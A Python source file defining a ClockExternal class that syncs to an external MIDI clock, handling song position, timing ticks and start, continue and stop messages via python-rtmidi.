from rtmidi.midiconstants import SONG_POSITION_POINTER, TIMING_CLOCK, SONG_START, SONG_CONTINUE, SONG_STOP
from .clock_abstract import ClockAbstract
from .midi_input import MidiInput
class ClockExternal(ClockAbstract, MidiInput):
def __init__(self, name=None, port=None):
ClockAbstract.__init__(self)
MidiInput.__init__(self, name, port)
self.midiin.ignore_types(timing=False)
def _callback(self, event, _):
message, _ = event
midiEvent = message[0]
if midiEvent == SONG_POSITION_POINTER:
front = message[1]
back = message[2]
position = 1 + (128 * front) + back
self._setSongPosition(position)
elif midiEvent == TIMING_CLOCK:
self._clockTick()
elif midiEvent == SONG_START:
self._setState(ClockAbstract.State.Start)
elif midiEvent == SONG_CONTINUE:
self._setState(ClockAbstract.State.Continue)
elif midiEvent == SONG_STOP:
self._setState(ClockAbstract.State.Stop)
| 30.857143 | 106 | 0.659259 |